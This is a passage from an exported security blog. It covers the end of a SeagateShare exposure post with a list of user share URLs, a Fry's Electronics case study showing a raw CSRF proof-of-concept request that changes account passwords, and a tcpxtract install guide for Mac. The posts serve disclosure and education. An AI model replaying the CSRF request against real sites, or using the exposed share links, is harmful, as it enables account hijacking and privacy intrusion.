<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zx-goflex" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zx-goflex</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zxcvdrive" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zxcvdrive</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zxseagatedrive" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zxseagatedrive</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zygmanbackup" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zygmanbackup</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zyybakcup" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zyybakcup</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zzstore" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zzstore</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">………………….</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">………………….</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Responsible Disclosure</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">As a part of the responsible disclosure process, both vulnerabilities were reported to the Seagate security </span><br />
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">team with the following response.</span><br />
<span style="font-family: "cambria"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre;"><br /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li><span style="font-family: "times" , "times new roman" , serif;"><span style="font-weight: 700; vertical-align: baseline; white-space: pre;">Vulnerability 1:</span><i><span style="vertical-align: baseline; white-space: pre;"> </span><span style="background-color: white; color: #222222; vertical-align: baseline; white-space: pre;">Thank you for your communication and responsible disclosure on
vulnerability </span></i><i><span style="background-color: white; color: #222222; vertical-align: baseline; white-space: pre;">details </span>in SeagateShare Portal. We have carefully evaluated the matter <br />and do not presently have plans for active remediation measures. Thank you for your <br />time and help in bringing this vulnerability to our attention. We really appreciate your <br />efforts and would like to encourage you in sharing any new vulnerabilities that are <br />related to our products and or services.</i></span></li>
<li><span style="font-family: "times" , "times new roman" , serif;"><span style="background-color: white; color: #222222; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Vulnerability 2:</span><span style="background-color: white; color: #222222; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: white; color: #222222; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">XSS issue has been fixed and deployed. </span></span></li>
</ul>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-89469165940055725862017-10-04T10:44:00.001-07:002017-10-04T10:44:44.470-07:00Case Study: Frys Electronics Web Portal - How Exactly *Not To Design* Password Change Component !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyx1hW9SDy0yaRRkVJAg69llP6EDr6QRFbgz_c3ltRkc1sfPD7IlzXR1URP56q0OW5YiwkrBzY839aKXn_f-QdHkWOU9Qf1KgDbK1rAI2DJWtR8qJajH5E1Cpexh2pHj-8Nu-g3A/s1600/shutterstock_162087113.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="667" data-original-width="1000" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyx1hW9SDy0yaRRkVJAg69llP6EDr6QRFbgz_c3ltRkc1sfPD7IlzXR1URP56q0OW5YiwkrBzY839aKXn_f-QdHkWOU9Qf1KgDbK1rAI2DJWtR8qJajH5E1Cpexh2pHj-8Nu-g3A/s640/shutterstock_162087113.jpg" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">NOTE: </span><span style="font-family: "cambria"; font-size: 14.666666984558105px; white-space: pre-wrap;">The issue highlighted in this post is for educational purposes only. </span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Last weekend some electronic gadgets were ordered from the Fry’s electronic store at (</span><a href="https://shop3.frys.com//wf?a=SIGN_IN,w=CHECKOUT=1" style="text-decoration: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://shop3.frys.com//wf?a=SIGN_IN,w=CHECKOUT=1</span></a><span style="font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">). An account was created and after interacting with the web application for 10 minutes, a number of security issues were identified in the Fry's online portal due to insecure design and coding practices. The idea behind this post is to educate application developers on how to design secure components. It is just something I came across and decided to share.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">In this post, the insecure design of "Password Change Component" has been presented. The user should take the highlighted issue in consideration while accessing the online web portal.</span></div>
<b style="font-weight: normal;"><br /></b><span style="font-family: "cambria"; font-size: 11pt; font-weight: 700; white-space: pre-wrap;">Insecure Design - Password Change Component</span><br />
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It has been noticed that the "Password Change Component" used by Fry's online portal is designed insecurely. A secure design practice involves that application component should ask for the “old password” from the user before the new password is supplied and verified accordingly. This is required by the application to perform additional password verification to determine whether the HTTP request is issued by the legitimate user or not. If the “old password” is required and validated, it enhances the design and robustness of the system. Further, the component does not even enforce complex password requirements. For examples:- (1) the last used password can be reset again as new password, (2) minimum password length enforced is 6 characters. Many other variables in the password complexity requirements are not met either.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="217" src="https://lh3.googleusercontent.com/ryk13SFBcEaBMuzEKHhGDDHZbCJ1Q_iXhwDAMAxjPwzn-JSNnH9lPyFWGO8lB_GcAbPK_MDVpYntT9P37AUw9y_3phClEDlBXNPzZ0n29ekuIh5TYsASn1Y2if9v-0AYPNcRul9z" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: "cambria"; font-size: 11pt; font-style: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The issue does not end here. The flaw highlighted above is a basic design fallacy. <u><span style="color: red;">Let's see how multiple vulnerabilities can be chained together. </span></u></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cross-site Request Forgery - Password Change Component</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The password change component (mod_exist_password.php) is vulnerable to Cross-site Request Forgery (CSRF) attack. Let's look into a number of design checks:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<ol>
<li><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">The application does not implement origin verification checks either via unique tokens or "Origin" header. As a result, HTTP POST requests are accepted by application without any token verification and validation.</span></li>
<li><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">The password change component does not explicitly enforce the verification of “old password”.</span></li>
<li><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">The application does not even perform a basic "HTTP Referer" verification check on the server side.</span></li>
</ol>
<br />
<span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">It means the attacker can easily author a CSRF exploit to change the password on the fly which ultimately results in the account hijacking. </span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's validate this.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The HTTP POST request is taken from the CSRF exploit drafted as a Proof-of-Concept (PoC). It can be deciphered that the HTTP POST request does not carry any token as a part of request header or the body header. </span><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">In addition, the ‘Referer” header is also removed from the HTTP request. </span><span style="font-family: "cambria"; font-size: 11pt; white-space: pre-wrap;">General, “Referer” validation on the server side is treated as a defense against CSRF attack. In this case, no "Referer" validation is performed either. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">POST /wf HTTP/1.1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Host: shop3.frys.com</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept-Language: en-US,en;q=0.5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Type: application/x-www-form-urlencoded</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Length: 169</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cookie: ID_KOT=987123654; J1_USER_ID=[Removed]; BTgroup=B; FSERVERID=s107</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Connection: close</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Upgrade-Insecure-Requests: 1</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">r=misc,c=new_password=[Truncated]&r=misc,c=new_password_again=[Truncated]&a=MODIFY_PASSWORD,w=ACCTMAINT=&button.x=21&button.y=9</span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HTTP/1.1 200 OK</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Date: </span><span style="font-family: "cambria"; font-size: 12px; white-space: pre-wrap;"> [Truncated]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Server: Apache</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cache-Control: max-age=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Expires: [Truncated]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Vary: Accept-Encoding</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Connection: close</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Type: text/html;charset=ISO-8859-1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Via: 1.1 sjc1-10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Length: 13877</span></div>
</td></tr>
</tbody></table>
</div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">By simply sending the HTTP POST request to the server via a CSRF exploit when the user is logged-in the session, the attacker can change the end-user password.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Disclosure:</b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Frys was contacted via Twitter and via LinkedIn as no direct security contact information was available. No response was received so the details have been released.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgairfrxVqq5kEOTZnrrui_aXrZr7XM-YxEAmXsdLKIr44v5CRzVVf00UImC_bZyos_Sq7f0EFIqKpG8NFYlhnoDJBvXbDNCbsvCg0xVAwIDBnLFM2fX0eIrzsP2MCy6ym2Oy33Xw/s1600/Screen+Shot+2017-10-04+at+10.19.25+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="262" data-original-width="1192" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgairfrxVqq5kEOTZnrrui_aXrZr7XM-YxEAmXsdLKIr44v5CRzVVf00UImC_bZyos_Sq7f0EFIqKpG8NFYlhnoDJBvXbDNCbsvCg0xVAwIDBnLFM2fX0eIrzsP2MCy6ym2Oy33Xw/s640/Screen+Shot+2017-10-04+at+10.19.25+AM.png" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-81874851002098199702015-03-07T10:48:00.002-08:002015-03-07T10:48:27.334-08:00TCPExtract (or TCPxtract) Installation Discrepancies on Mac - Step-by-Step !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEislCBEyzAwqY7bvauE3Ee6BxMb9u8TH1oVrKbagCl1sFMla2qW_OILFaAc3IR1bwgp0LDxlQYniUYqdHv3swoDjryhTlBgGqKe1fmhmMW8XjEqzWKuGggceJjw_n9k0dKfaz3K3g/s1600/6FgH3zpA.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEislCBEyzAwqY7bvauE3Ee6BxMb9u8TH1oVrKbagCl1sFMla2qW_OILFaAc3IR1bwgp0LDxlQYniUYqdHv3swoDjryhTlBgGqKe1fmhmMW8XjEqzWKuGggceJjw_n9k0dKfaz3K3g/s1600/6FgH3zpA.png" height="200" width="200" /></a></div>
TCPExtract (or TCPxtract) is used for extracting specific set of files from the PCAPs by looking into TCP sessions. During object extraction or file analysis in the network traffic, this tool is used. Installation of this tool on the Mac is tricky and several issues need to be debugged before it installs appropriately. I spent sometime on this tool during installation and thought to share the complete solution. The step by step approach installation steps are discussed below:<br />
<br />
My Mac is configured with brew (you can repeat the same steps with ports also).<br />
<br />
1. you need to install libnet : <b>brew install libnet.</b><br />
2. you need to install libnids : <b>brew install libnids</b><br />
3. you need to install pynids : <b>wget <a href="https://jon.oberheide.org/pynids/downloads/pynids-0.6.1.tar.gz">https://jon.oberheide.org/pynids/downloads/pynids-0.6.1.tar.gz</a> --no-check-certificate</b><br />
<ul>
<li><b>ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future python setup.py build (Clang issue due to updates by Apple related to XCode : <a href="https://langui.sh/2014/03/10/wunused-command-line-argument-hard-error-in-future-is-a-harsh-mistress/">https://langui.sh/2014/03/10/wunused-command-line-argument-hard-error-in-future-is-a-harsh-mistress/</a>)</b></li>
<li><b>sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future python setup.py install</b></li>
</ul>
4. Download tcpxtract from source forge: http://tcpxtract.sourceforge.net/<br />
<ul>
<li>extract the tcpxtract files into a folder using - <b><a href="http://tar%20zxvf%20tcpxtract.tar.xz/">tar zxvf tcpxtract.tar.xz</a></b></li>
<li>./configure</li>
<li>Before doing make (try one of the steps)</li>
</ul>
<ul><ul>
<li>cd /usr/lib and<b> sudo ln -s libl.a libfl.a (Flex issue, need to link the libraries - <a href="http://www.linuxfromscratch.org/lfs/view/6.4/chapter06/flex.html">http://www.linuxfromscratch.org/lfs/view/6.4/chapter06/flex.html</a>)</b></li>
<li>add ldl flag after object files :<b> gcc -D_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -g -O2 -o tcpxtract tcpxtract.o sessionlist.o util.o confy.o confl.o conf.o search.o extract.o -lpcap -lfl</b></li>
</ul>
</ul>
<ul>
<li>make</li>
<li>sudo make install</li>
</ul>
How it goes:<br />
<br />
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>$ ./tcpxtract -f ~/malware_pcaps_repository/<wbr></wbr>botnet_cc_pcaps/Keylogger_<wbr></wbr>Limlspy.A.pcap -o dump/</i></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>Found file of type "html" in session [<a href="http://50.116.98.95:20480/" style="color: #1155cc;" target="_blank">50.116.98.95:20480</a> -> <a href="http://172.31.2.41:14528/" style="color: #1155cc;" target="_blank">172.31.2.41:14528</a>], exporting to dump/00000001.html</i></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
